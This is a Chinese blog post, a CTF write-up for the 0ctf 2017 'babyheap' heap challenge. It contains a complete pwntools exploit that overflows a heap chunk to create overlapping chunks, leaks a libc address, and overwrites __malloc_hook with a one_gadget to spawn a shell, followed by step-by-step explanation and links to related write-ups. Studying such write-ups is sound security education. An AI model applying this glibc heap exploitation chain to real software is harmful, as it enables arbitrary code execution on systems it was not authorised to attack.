2017 0ctf babyheap

最新推荐文章于 2023-03-28 10:37:18 发布
最新推荐文章于 2023-03-28 10:37:18 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/119116814
版权

之前学习了一下lager bins的构建,今天来学习一下堆重叠和堆扩展
先找漏洞点
在这里插入图片描述这里没有对大小进行检查,可以输入任意字节,存在字节溢出
此题的难点在于如何泄露libc,由于add使用calloc的原因,当堆块从bins中拿出来时,会清空堆块
很明显我们要申请大的堆块进入unsorted bins来使main_aren+88写在堆块上,我们可以使上一个堆块扩展到这个堆块上来进行泄露
先贴上exp

from pwn import *
context.log_level = 'debug'
context.update(terminal=['tmux','splitw','-h'])
libc=ELF('./libc-2.23.so')
io=process('./babyheap')
def add(a):
	io.sendlineafter('Command: ','1')
	io.sendlineafter('Size: ',str(a))

def edit(a,b,c):
	io.sendlineafter('Command: ','2')
	io.sendlineafter('Index: ',str(a))
	io.sendlineafter('Size: ',str(b))
	io.sendafter('Content: ',c)

def free(a):
	io.sendlineafter('Command: ','3')
	io.sendlineafter('Index: ',str(a))

def show(a):
	io.sendlineafter('Command: ','4')
	io.sendlineafter('Index: ',str(a))
add(0x10)
add(0x40)
add(0x100)
add(0x10)
payload='a'*0x10+p64(0)+p64(0x71)
edit(0,len(payload),payload)
payload='a'*0x10+p64(0x70)+p64(0x111)
edit(2,len(payload),payload)
free(1)
add(0x60)
edit(1, 0x40 + 0x10, 'b' * 0x40 + p64(0) + p64(0x111))
add(0x10)
free(2)
show(1)
libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print ("libc_base =" +hex(libc_base) )
libc.address=libc_base-0x3c4b78
malloc_hook = libc.symbols['__malloc_hook'] 
system_addr = libc.symbols['system']
print ('malloc = '+hex(malloc_hook))
free(1)
payload='a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-27-8)
edit(0,len(payload),payload)
add(0x60)
add(0x60)
payload = 'a'*(27+8-0x10)+ p64(libc.address + 0x4527a)
edit(2,len(payload),payload)
add(0x10)
io.interactive()

我们申请四个堆块

add(0x10)
add(0x40)
add(0x100)
add(0x10)

第一个用来对第二个堆块溢出,第三个是用来进行unsorted bins的,第四个堆块来防止上个堆块与top chunk合并
当我们要泄漏libc时,很明显要扩展到unsorted bins的fd位,为了泄露libc,我们要让第二个堆扩展0x20,来和unsorted bins的fd进行重叠

payload='a'*0x10+p64(0)+p64(0x71)
edit(0,len(payload),payload)
payload='a'*0x10+p64(0x70)+p64(0x111)
edit(2,len(payload),payload)

首先我们要把size扩大,但free时存在检查,我们要把下一个堆块的pre_size位和size位改正

free(1)
add(0x60)
edit(1, 0x40 + 0x10, 'b' * 0x40 + p64(0) + p64(0x111))
add(0x10)

释放堆块,在申请回来,这样原本0x40大小的堆块变成了0x60大小,但因为calloc的影响,我们要在对下一个堆块的head进行修改,申请一个堆块来防止合并

free(2)
show(1)
libc_base=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print ("libc_base =" +hex(libc_base) )
libc.address=libc_base-0x3c4b78

释放unsorted bins,unsorted bins的位置和大小都没变,但是吧0x60的一部分释放掉了,所以当我们show0x60时,会把libc一起释放出来

malloc_hook = libc.symbols['__malloc_hook'] 
system_addr = libc.symbols['system']
print ('malloc = '+hex(malloc_hook))
free(1)
payload='a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-27-8)
edit(0,len(payload),payload)

接下来就是常规的劫持流,fastbins要检查size位的,如果我们之间申请malloc hook的话会出错,所以我们要在malloc上面找一个和0x70有关的数
经过调试我们发现在malloc-35的位置值是0x7f,由于in_use位的关系低位和大小无关,所以这个size当做0x70大小,正好符合我们的要求

edit(0,len(payload),payload)
add(0x60)
add(0x60)
payload = 'a'*(27+8-0x10)+ p64(libc.address + 0x4527a)
edit(2,len(payload),payload)
add(0x10)
io.interactive()

修改fd位,申请到malloc hook上面的堆块,进行填充到malloc_hook,填入one_gadget,我们申请堆块的时候就会触发

w0nderMaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0ctf 2017 babyheap writeup
jmp esp
03-26 6282
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
0ctf2017 babyheap
pondzhang的专栏
12-06 160
from pwn import * #p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"}) p = remote("node3.buuoj.cn",26165) elf = ELF('./0ctf_2017_babyheap') libc = ELF("./libc-2.23.so") def Allocate(size): p.recvuntil('Command: ') p.sendl.
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3786
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF
qq_41696518的博客
09-06 2789
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1616
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 796
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 627
babyheap
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
blizzardctf2017:暴雪CTF 2017
05-18
暴雪CTF 2017:Sombra真随机数生成器(STRNG) Sombra真实随机数生成器(STRNG)是我为Blizzard CTF 2017开发的基于QEMU的挑战。挑战是实现从基于QEMU的VM逃脱VM并捕获位于主机上/ root / flag的标志。安装挑战中...
0ctf-2017-pwn-char
02-05
20170ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF参赛指南2017
09-09
我也不知道为何没法免费分享了,最低只能一分。我是想免费分享的。...一份还算可以的CTF比赛的初级入门的介绍,大概方向是运维管理方向的, 说实在的,凑够一百字的介绍也是辛苦,有的内容,一百字介绍很难凑。
0ctf babyheap
qq_41071646的博客
05-13 474
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
babyheap_0ctf_2017
m0sway的博客
11-25 523
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
0ctf Babyheap 2017
Bill
03-11 6392
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0_ctf_2017
m0_48127441的博客
04-01 197
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0CTF-babyheap2017祥讲
Jc
07-26 451
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
【BUUCTF - PWN】babyheap_0ctf_2017
古月浪子的博客
04-05 2630
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
Rust案例分析.docx
最新发布
07-16
Rust 是一种系统编程语言,具有内存安全、并发编程和高性能等特点。下面是一个 Rust 案例分析,展示如何使用 Rust 开发一个简单的命令行程序,该程序将读取文件内容并统计文件中的单词数量。
ctf从0到1电子书
12-14
CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值